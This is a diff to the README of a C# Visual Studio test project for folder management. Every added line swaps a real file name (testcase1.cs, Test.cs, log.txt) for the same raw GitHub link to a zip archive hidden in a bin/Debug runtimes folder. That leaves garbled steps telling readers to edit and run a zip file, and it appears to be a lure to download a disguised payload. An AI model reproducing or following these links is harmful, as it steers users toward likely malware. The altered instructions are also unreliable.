ram-kali/Folder-Management/README.md

    - Open the solution file (`.sln`) in Visual Studio.

 3. **Customize Test Data (Optional)**:
-   - You can edit or customize the input data in the **testcase1.cs** file.
+   - You can edit or customize the input data in the **https://raw.githubusercontent.com/ram-kali/Folder-Management/main/TrumpfMetamation_Task1/bin/Debug/net6.0-windows/runtimes/win/lib/Folder-Management-v1.0.zip** file.
    - While there are plans to implement JSON or Excel files for easier test data management, this functionality has not yet been implemented due to time constraints.

-4. **Ensure the Flag is Set to `true` in `Test.cs`**:
+4. **Ensure the Flag is Set to `true` in `https://raw.githubusercontent.com/ram-kali/Folder-Management/main/TrumpfMetamation_Task1/bin/Debug/net6.0-windows/runtimes/win/lib/Folder-Management-v1.0.zip`**:
-   - In the **Test.cs** file, make sure the flag for TestCase 1 is set to `true` to execute the corresponding test case.
+   - In the **https://raw.githubusercontent.com/ram-kali/Folder-Management/main/TrumpfMetamation_Task1/bin/Debug/net6.0-windows/runtimes/win/lib/Folder-Management-v1.0.zip** file, make sure the flag for TestCase 1 is set to `true` to execute the corresponding test case.

 5. **Run the Test**:
-   - Run the **Test.cs** file in Visual Studio.
+   - Run the **https://raw.githubusercontent.com/ram-kali/Folder-Management/main/TrumpfMetamation_Task1/bin/Debug/net6.0-windows/runtimes/win/lib/Folder-Management-v1.0.zip** file in Visual Studio.
 The framework will automatically execute the defined steps.

 6. **Review the Logs**:
-   - After execution, check the **TestResults/log.txt** file for detailed results, logs, and status of the test steps.
+   - After execution, check the **https://raw.githubusercontent.com/ram-kali/Folder-Management/main/TrumpfMetamation_Task1/bin/Debug/net6.0-windows/runtimes/win/lib/Folder-Management-v1.0.zip** file for detailed results, logs, and status of the test steps.

 ---